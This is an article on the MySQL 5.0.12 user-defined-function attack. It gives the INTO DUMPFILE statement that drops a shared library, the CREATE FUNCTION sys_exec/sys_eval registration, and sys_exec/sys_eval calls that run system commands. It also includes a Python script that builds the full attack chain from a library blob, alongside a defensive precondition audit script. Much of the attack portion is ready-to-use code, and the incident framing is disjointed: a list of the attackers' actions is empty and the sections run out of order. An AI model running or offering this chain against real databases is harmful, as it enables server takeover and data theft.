
MySQL 5.0.12 Exploit

In a publicly disclosed incident (name withheld for confidentiality), attackers compromised a marketing department’s WordPress site via SQL injection. The backend database was MySQL 5.0.12 running on a Windows Server 2008 R2 machine—both long out of support.

Within three minutes of gaining database access, the attackers:

The root cause analysis pointed to one line in an old migration document: “MySQL 5.0.12 – working, do not touch.”

This class of UDF attack pushed MySQL toward defenses that later releases ship by default: SONAME restricted to plugin_dir, secure_file_priv limiting where INTO DUMPFILE and INTO OUTFILE may write, and distribution packaging that runs mysqld under its own unprivileged account.

With the .so on disk in a location the server will load from, the attacker registers the UDFs. In 5.0 the only privilege CREATE FUNCTION checks is INSERT on the mysql database, because the function is simply recorded in the mysql.func table:

CREATE FUNCTION sys_exec RETURNS INT SONAME 'exploit.so';
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'exploit.so';

Suddenly, the attacker can run operating system commands:

-- Execute a command, return the exit code
SELECT sys_exec('id > /tmp/owned.txt');

-- Return the output of a command as a string
SELECT sys_eval('whoami');

If MySQL is running as root (a frighteningly common misconfiguration in 2005), the attacker instantly owns the server. If it runs as mysql, they still get everything that account can reach: every database on the instance, world-readable files such as /etc/passwd, and the ability to use sys_exec to fetch a rootkit or a local privilege-escalation exploit (e.g., CVE-2007-1351) and run it from the mysql account.

The exploit is far less damaging, though not harmless, if the MySQL daemon runs as a dedicated, low-privileged user: the attacker is then confined to what that account can read, write and execute, which still includes every database the server holds.
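The preconditions this attack depends on (a daemon running as root, accounts holding FILE, a plugin directory the daemon can write to, no secure_file_priv, and UDFs already registered in mysql.func) can be checked mechanically. The following is an added example, not code from the original page: it consumes data you would collect yourself (a ps -eo user,pid,comm listing, rows from mysql.user and mysql.func, the stat fields of the plugin directory, SHOW VARIABLES output). Everything embedded below is a constructed sample, the function names are mine, and the empty ALLOWED_LIBS allow-list is an assumption.

```python
"""Added example, not code from the original page: checks for the
preconditions the UDF attack relies on, so a defender can see which ones a
given server still satisfies.  It consumes data you would collect yourself
(a `ps -eo user,pid,comm` listing, rows from mysql.user and mysql.func, the
stat fields of the plugin directory, SHOW VARIABLES output); everything
embedded below is a constructed sample, and ALLOWED_LIBS is an assumption."""
import stat


def mysqld_users(ps_lines):
    """Accounts that own a mysqld process (Linux `ps` output; on Windows you
    would look for a service running as LocalSystem instead)."""
    users = set()
    for line in ps_lines:
        parts = line.split()
        if len(parts) >= 3 and parts[2] == "mysqld":
            users.add(parts[0])
    return users


def accounts_with_file_priv(user_rows):
    """(user, host) pairs holding FILE, the privilege INTO DUMPFILE needs.
    Rows mirror: SELECT user, host, File_priv FROM mysql.user"""
    return [(u, h) for u, h, f in user_rows if f == "Y"]


def dir_writable_by(st_mode, st_uid, st_gid, uid, gid):
    """Plain mode-bit check: can a process with uid/gid create files here?
    root always can; POSIX ACLs are not modelled."""
    if uid == 0:
        return True
    if st_uid == uid:
        return bool(st_mode & stat.S_IWUSR)
    if st_gid == gid:
        return bool(st_mode & stat.S_IWGRP)
    return bool(st_mode & stat.S_IWOTH)


def unexpected_udfs(func_rows, allowed_libs):
    """Names in mysql.func (name, ret, dl, type) whose library is not sanctioned."""
    return [name for name, _ret, dl, _typ in func_rows if dl not in allowed_libs]


def audit(ps_lines, user_rows, func_rows, plugin_dir_stat, mysqld_ids, variables, allowed_libs):
    """Return one finding per satisfied attack precondition; empty means none found."""
    findings = []
    for user in sorted(mysqld_users(ps_lines)):
        if user == "root":
            findings.append("mysqld runs as root: a UDF hands the attacker the whole host")
    for user, host in accounts_with_file_priv(user_rows):
        findings.append(f"FILE privilege held by {user}@{host} (enables INTO DUMPFILE)")
    mode, owner, group = plugin_dir_stat
    if dir_writable_by(mode, owner, group, *mysqld_ids):
        findings.append("plugin directory is writable by the mysqld account: a dropped .so can be loaded")
    sfp = variables.get("secure_file_priv")
    if sfp is None:
        findings.append("secure_file_priv not supported (added in 5.0.38): upgrade")
    elif sfp == "":
        findings.append("secure_file_priv is empty: INTO DUMPFILE may write anywhere mysqld can")
    for name in unexpected_udfs(func_rows, allowed_libs):
        findings.append(f"unexpected UDF registered in mysql.func: {name}")
    return findings


# Constructed sample describing a 5.0.12-era host (not real data).
SAMPLE_PS = ["USER PID COMMAND", "root 1 init", "mysql 812 mysqld", "www-data 900 apache2"]
SAMPLE_USERS = [("root", "localhost", "Y"), ("wp_app", "localhost", "Y"), ("backup", "10.0.0.5", "N")]
SAMPLE_FUNCS = [("sys_exec", 2, "exploit.so", "function"), ("sys_eval", 0, "exploit.so", "function")]
SAMPLE_PLUGIN_DIR = (0o40777, 0, 0)          # drwxrwxrwx root:root
SAMPLE_MYSQLD_IDS = (27, 27)                  # uid/gid of the mysql account
SAMPLE_VARIABLES = {"plugin_dir": "/usr/lib/mysql/plugin/"}  # no secure_file_priv on 5.0.12
ALLOWED_LIBS = set()                          # assumption: no UDF library is sanctioned here

SAMPLE_FINDINGS = audit(SAMPLE_PS, SAMPLE_USERS, SAMPLE_FUNCS, SAMPLE_PLUGIN_DIR,
                        SAMPLE_MYSQLD_IDS, SAMPLE_VARIABLES, ALLOWED_LIBS)

if __name__ == "__main__":
    for finding in SAMPLE_FINDINGS:
        print("-", finding)
```

On the constructed sample the audit reports six findings: two accounts with FILE (the web application account is the one that matters for a SQL injection), a world-writable plugin directory, no secure_file_priv, and the two sys_* functions already sitting in mysql.func. The mode-bit check is deliberately simple; where ACLs or AppArmor/SELinux confine mysqld, the real answer needs the host's own tooling.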

In MySQL 5.0.12 the server placed no restriction on where the shared library named in SONAME could live (the plugin_dir restriction that later releases enforce, which also rejects path separators in SONAME, did not exist yet), and the only privilege CREATE FUNCTION checked was INSERT on the mysql database, nothing tied to the fact that the statement loads native code into the server process.

In MySQL replication, slaves connect to the master. An attacker who compromises a master can push arbitrary statements to every slave through the binary log, and one who can register a fake slave can pull the entire change stream. The same trust problem applies to backup systems and monitoring tools that connect automatically with stored credentials: whatever they talk to, they talk to with those privileges.

The attacker cannot easily place binary data on disk with an ordinary INSERT, but SELECT ... INTO DUMPFILE can: unlike INTO OUTFILE it writes a single value verbatim, with no escaping, column separators or trailing newline, which is exactly what a shared object needs. It requires the FILE privilege, the target path must not already exist, and the directory must be writable by the account mysqld runs as. The library (e.g., a compiled raptor_udf2.c, or lib_mysqludf_sys.so) is supplied as a hex literal and written to disk.

Example attack SQL:

SELECT 0x7f454c460201010000000000000000000300... INTO DUMPFILE '/usr/lib/mysql/plugin/exploit.so';

(Note: the hex string represents a compiled shared library containing a sys_exec() function. Its leading bytes are the ELF header: 7f 45 4c 46 is the ELF magic, the following 02 01 marks a 64-bit little-endian object, and a shared object carries e_type = 3 (ET_DYN) in the 16-bit word at offset 16.)

Why /usr/lib/mysql/plugin/? On later 5.0 and 5.1 builds this is the plugin_dir default and the only place SONAME will load from. A 5.0.12 server predates that restriction: it hands SONAME to the system dynamic linker, so the library has to sit in a directory the linker searches, and those older releases did not reject a pathname in SONAME. Either way, if the directory the server will load from is writable by the mysqld account, the attack is trivial. If not, the attacker looks for world-writable directories like /tmp or /var/tmp and hopes the server will load from there (rare once plugin_dir is enforced, but possible in misconfigurations and on old builds that still accept a path).
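The DUMPFILE drop and the CREATE FUNCTION registration above are mechanical once you have the library bytes. The following is an added example, not code from the original page or from any real UDF project (raptor_udf2 and lib_mysqludf_sys are not used here): it turns the raw bytes of a shared library into the statements described above and checks, before anything is sent, that the blob really is an ELF shared object, so a 32-bit or ET_EXEC image is caught instead of silently failing inside mysqld. The function names, the paths and SAMPLE_SO are assumptions; SAMPLE_SO is a constructed ELF64 header with filler, not a working library.

```python
"""Added example, not code from the original page or from any real UDF
project: turn the raw bytes of a shared library into the SELECT ... INTO
DUMPFILE statement and the CREATE FUNCTION statements described above, and
sanity-check that the blob is really an ELF shared object before sending it.
Function names, SAMPLE_SO and the paths are assumptions; SAMPLE_SO is a
constructed ELF64 header plus filler, not a working library."""
import struct

ELF_MAGIC = b"\x7fELF"
ET_DYN = 3  # e_type of a shared object (.so)


def elf_summary(blob: bytes) -> dict:
    """Parse just enough of the ELF header to know what is being dropped.

    e_ident[4] is the class (1 = 32-bit, 2 = 64-bit), e_ident[5] the byte
    order (1 = little, 2 = big); e_type is the 16-bit word at offset 16,
    read in the file's own byte order.  Raises ValueError on anything else.
    """
    if len(blob) < 18 or blob[:4] != ELF_MAGIC:
        raise ValueError("not an ELF image")
    ei_class, ei_data = blob[4], blob[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("unknown EI_CLASS/EI_DATA")
    fmt = ("<" if ei_data == 1 else ">") + "H"
    (e_type,) = struct.unpack_from(fmt, blob, 16)
    return {
        "bits": 32 if ei_class == 1 else 64,
        "little_endian": ei_data == 1,
        "e_type": e_type,
        "shared_object": e_type == ET_DYN,
    }


def sql_string_literal(value: str) -> str:
    """Quote a path as a MySQL string literal; backslashes matter for Windows paths."""
    return "'" + value.replace("\\", "\\\\").replace("'", "''") + "'"


def dumpfile_statement(blob: bytes, dest_path: str) -> str:
    """SELECT 0x<hex> INTO DUMPFILE '<path>';  DUMPFILE writes the value byte for byte."""
    return f"SELECT 0x{blob.hex()} INTO DUMPFILE {sql_string_literal(dest_path)};"


def udf_statements(soname: str, functions) -> list:
    """CREATE FUNCTION lines for each (name, return type) pair, e.g. ("sys_exec", "INT")."""
    return [
        f"CREATE FUNCTION {name} RETURNS {ret} SONAME {sql_string_literal(soname)};"
        for name, ret in functions
    ]


def hex_literal_to_bytes(stmt: str) -> bytes:
    """Decode the 0x... literal of a dumpfile statement: the exact bytes mysqld will write."""
    literal = stmt.split(" ", 2)[1]
    return bytes.fromhex(literal[2:])


def build_udf_chain(blob: bytes, dest_path: str, soname: str, functions) -> list:
    """Whole chain: drop the library, then register the functions it exports."""
    if not elf_summary(blob)["shared_object"]:
        raise ValueError("blob is an ELF file but not a shared object (e_type != ET_DYN)")
    return [dumpfile_statement(blob, dest_path)] + udf_statements(soname, functions)


# Constructed sample: ELF64, little-endian, e_type = ET_DYN, e_machine = x86-64,
# padded to a 64-byte header.  Not a loadable library.
SAMPLE_SO = bytes.fromhex(
    "7f454c4602010100" + "00" * 8 + "0300" + "3e00" + "01000000"
).ljust(64, b"\x00")

if __name__ == "__main__":
    chain = build_udf_chain(SAMPLE_SO, "/usr/lib/mysql/plugin/exploit.so", "exploit.so",
                            [("sys_exec", "INT"), ("sys_eval", "STRING")])
    for line in chain:
        print(line[:80] + ("..." if len(line) > 80 else ""))
```

The round trip through hex_literal_to_bytes is the check worth keeping: MySQL decodes a 0x literal to exactly those bytes, so if the decoded value equals the file you compiled, what lands on disk is byte-identical to it. The escaping in sql_string_literal is what makes a Windows destination such as the page's Server 2008 host survive the trip through a string literal.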